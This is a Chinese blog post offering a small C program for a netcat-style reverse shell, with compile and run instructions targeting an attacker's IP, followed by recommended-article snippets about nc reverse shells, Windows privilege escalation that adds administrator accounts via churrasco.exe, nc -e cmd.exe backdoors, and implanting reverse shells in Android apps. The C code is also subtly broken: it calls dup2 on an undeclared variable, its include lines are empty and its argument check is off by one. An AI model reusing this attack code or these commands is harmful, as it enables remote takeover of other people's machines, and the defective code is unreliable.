NC反弹的小demo

最新推荐文章于 2024-07-24 21:24:56 发布
最新推荐文章于 2024-07-24 21:24:56 发布
阅读量519 收藏 1
点赞数
分类专栏: Linux C 网络 文章标签: shell

一个有趣的NC反弹shell的demo

#include  
#include  
#include  
#include  
#include  
void error(char *msg)  
{  
    perror(msg);  
    exit(0);  
}  
int main(int argc, char *argv[])  
{  
    int sockfd, portno, lportno,n;  
    struct sockaddr_in serv_addr;  
    struct sockaddr_in client_addr;  
    struct hostent *server;  
    char buffer[256];  
    if (argc < 3) {  
        fprintf(stderr,"usage %s hostname port LocalPortn",
         argv[0]);  
        exit(0);  
    } //三个参数,目标主机,目标主机端口,本地源端口  
    portno = atoi(argv[2]);  
    sockfd = socket(AF_INET, SOCK_STREAM, 0);  
    if (sockfd < 0)  
    error("ERROR opening socket");  
    bzero((char *) &client_addr, sizeof(client_addr));  
    lportno = atoi(argv[3]);  
    client_addr.sin_family = AF_INET;  
    client_addr.sin_addr.s_addr = INADDR_ANY;  
    client_addr.sin_port = htons(lportno); //设置源端口  
    if (bind(sockfd, (struct sockaddr *) &client_addr,  
    sizeof(client_addr)) < 0)  
    error("ERROR on binding");  
    server = gethostbyname(argv[1]);  
    if (server == NULL) {  
    fprintf(stderr,"ERROR, no such host ");  
    exit(0);  
    }  
        bzero((char *) &serv_addr, sizeof(serv_addr));  
    serv_addr.sin_family = AF_INET;  
    bcopy((char *)server->h_addr,  
    (char *)&serv_addr.sin_addr.s_addr,  
    server->h_length);  
    serv_addr.sin_port = htons(portno);  
    if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) //连接  
    error("ERROR connecting");  
    dup2(fd, 0);  
    dup2(fd, 1);  
    dup2(fd, 2);  
    execl("/bin/sh","sh -i", NULL); //执行shell  
    close(fd);  
}

编译后执行时候

    gcc client-port.c -o port  
    chmod +x port  
    ./port  你的IP 你的监听端口 本地的源端口

eg

./port 111.111.111.111 80 80

Quartz010
关注
专栏目录
nc.exe(nc反弹)
04-07
netcat被誉为网络安全界的‘瑞士军刀’,相信没有什么人不认识它吧...... 一个简单而有用的工具,透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,能够建立你需要的几乎所有类型的网络连接,还有几个很有意思的内置功能(详情请看下面的使用方法)。 在中国,它的WINDOWS版有两个版本,一个是原创者Chris Wysopal写的原版本,另一个是由‘红与黑’编译后的新‘浓缩’版。‘浓缩’版的主程序只有10多KB(10多KB的NC是不能完成下面所说的第4、第5种使用方法,有此功能的原版NC好象要60KB:P),虽然“体积”小,但很完成很多工作。
NC反弹CMDSHELL提权总结
weixin_34404393的博客
03-15 576
Server-U等都不可以用的情况下.   一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了…. 1:通过shell将上传NC和CMD传到站点目录下(这里一定上传的注意权限,最好是可读写目录下)web目录都是有写有读的权限,我们直接传NC进去   2:然后本地执行nc -vv -lp 52进行反弹   ...
反弹shell的方式——之NC反弹shell
最新发布
aihua002的博客
07-24 484
反弹shell是指在攻击机监听某个端口,然后通过目标连接攻击机监听的端口,在攻击机反弹得到目标机的shell。通常在目标网络有防火墙或者其他因素限制,导致无法持续控制目标,或者执行命令受阻等情况时需要进行反弹shell
nc反弹cmd.zip
08-04
nc反弹cmd.zip
nc--反弹shell
wzhua的博客
08-04 2687
nc--反弹shell,小实验
常见工具 nc Wireshark反弹shell
代码审计
04-20 1380
常⽤⼯具 • 经常使⽤且功能强⼤ • 安全从业者必不可少的帮⼿ • Nc / ncat • Wireshark • Tcpdump nc -lvp 使用nc 监听特定的端口 nc -nv ip port 连接特定ip下的指定端口 NETCAT ——NC • ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧 • 侦听模式 / 传输模式 • telnet / 获取banner信息 • 传输⽂本信息 • 传输⽂件/⺫录 • 加密传输⽂件 • 远程控制/⽊⻢ • 加密所有流量 • 流媒体服务器 • 远程克隆硬盘 root@
linux 命令:nc、netcat、ncat、socat
墨鱼菜鸡
07-11 6487
参考 :http://www.linuxso.com/command/nc.html NC工具的使用说明教程:https://blog.csdn.net/xysoul/article/details/52270149 window 版本 nc 下载:https://eternallybored.org/misc/netcat/ 1、ncncat...
安卓木马demo_向安卓APK smali源码中植入木马
weixin_40008870的博客
12-24 2268
向安卓APK smali源码中植入木马反弹SHELL的测试代码【请勿用于非法目的,切记!】在安卓应用程序中植入木马已经不是什么新鲜事情,下面给出一个demo 反弹shell的一个smali源码,可以直接插入到目标应用的smali源码中,其中第一部分为函数体。注意修改其中的.line 行号。建议插入到一个smali文件的末尾,这样行号只要顺着原smali文件的行号增大即可。然后使用第二部分的源码进行...
java jdwp_利用 JAVA 调试协议 JDWP 实现反弹 shell
weixin_35971708的博客
02-13 820
说明前面已经有两篇文章介绍了有关反弹shell的内容,使用Java反弹shell和绕过exec获取反弹shell。之前的文章主要聚焦如何使用java来反弹shell。网上的各种文章也是将各种反弹shell的一句话的写法。但是鲜有文章分析不同反弹shell的方式之间的差异性,以及反弹shell之间的进程关联。初识BASH还是以最为简单的反弹shell为例来说明情况:bash -i >&...
靶机g0rmint练习:php一句话写入登录失败日志反弹shell,利用版本漏洞提权
7Riven's blog
01-07 642
1.主机发现 2.端口扫描 3.访问80端口看看 果然404页面,看看robots.txt 4.目录扫描 用dirbuster扫描看看 依次快速访问完目录后未发现有用信息,就先从登录界面仔细找找 查看下源码 直接访问试试,没什么结果 扫描该目录下还有哪些文件 只找到了一个,访问看看 有一个压缩后门文件,尝试下载看看 解压后如下: ...
[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
热门推荐
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
利用nc反弹cmdshell提权
01-27
利用nc反弹cmdshell提权 利用nc反弹cmdshell提权 利用nc反弹cmdshell提权
NCrar.rar 反弹工具
10-20
NCrar.rar 反弹工具 网络应用 内网入侵必备~~
NC_SHELL反弹提权.rar
05-09
,NC_SHELL反弹提权.
Linux下NC反弹shell命令(推荐)
09-15
主要介绍了Linux下NC反弹shell命令,非常不错,具有参考借鉴价值,需要的的朋友参考下吧
NC提权详细教程
12-04
NC提权 详细教程附带CMD命令 NC反弹 然后进行查看端口 netstat -an 进行连接 cd\ cd 360rec quert user C:\360Rec\churrasco.exe "logoff id" churrasco.exe "net user yuqing1453 4520829 /add" churrasco.exe "net localgroup administrators add /add" 首先执行命令 CMD。EXE 现在来执行NC命令 连接 本地远程访问反弹 就用这个吧~~ 换一个 命令成功完成。 这个YUQING1453是我之前的 命令成功完成。
NC反弹Shell
qq_23066945的博客
11-23 660
NC反弹Shell 实验环境 Kali Ubuntu(开启telnet) 一、Msf登录设置 1、保证kali使用telnet能够登陆Ubuntu(假设通过爆破,弱口令成功登录telnet) 使用telnet登录模块 设置目标ip(Ubuntu),用户名,密码(可以指定密码文件)run运行 可以看到,成功登录telnet,记录会话 选择第一个会话进行连接 然后下载事先准备好的文件123...
NC(瑞士军刀)反弹shell使用教程,实操演示,保姆级教学
2301_79015613的博客
03-14 1784
简介:nc瑞士军刀,通常被称为netcat或简称nc,是一个被誉为网络安全界的“瑞士军刀”的实用工具。它利用TCP或UDP协议的网络连接来读写数据,具有多种强大的功能,使用也相对简单,只需两台装有nc的PC,就可以进行各种网络操作。例如,通过监听特定端口,可以实现电子取证PC与电子取证设备之间的通信和数据同步。下面是nc的常用参数。
NC反弹提权教程
dibodang1423的博客
05-31 628
环境说明: Server-U 不可利用 pcAnywhere没有安装 提权思路: 上传NC,进行反弹连接。 命令说明: nc -l -p 110 -t -e c:\winnt\system32\cmd.exe -l 监听本地入栈信息-p port 打开本地端口 -t 以telnet形式应答入栈请求-e 程序重定向C:\RECYCLER\cmd....
NC 反弹shell
08-30
NC反弹shell是一种利用NetCat工具实现的一种技术,用于在目标机器和控制机器之间建立一个反向连接,并获得对目标机器的控制权。在反弹shell中,目标机器先执行NC命令,将shell连接到控制机器上的NC监听端口,从而使...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值